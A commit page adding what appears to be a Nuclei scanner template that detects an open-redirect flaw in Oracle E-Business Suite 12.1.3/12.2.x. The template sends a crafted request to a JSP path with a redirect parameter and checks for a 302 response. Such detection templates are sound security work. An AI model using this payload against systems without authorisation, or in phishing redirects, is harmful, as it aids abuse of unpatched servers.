Create oracle-ebusiness-openredirect.yaml
parent
57e24e9db1
commit
0187934d32
|
@ -0,0 +1,24 @@
|
||||||
|
id: oracle-ebusiness-openredirect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect
|
||||||
|
author: 0x_Akoko
|
||||||
|
severity: low
|
||||||
|
reference: https://www.exploit-db.com/exploits/43592
|
||||||
|
tags: Oracle,redirect
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/plus/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=/\example.com"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Location: https://example.com"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 302
|
Loading…
Reference in New Issue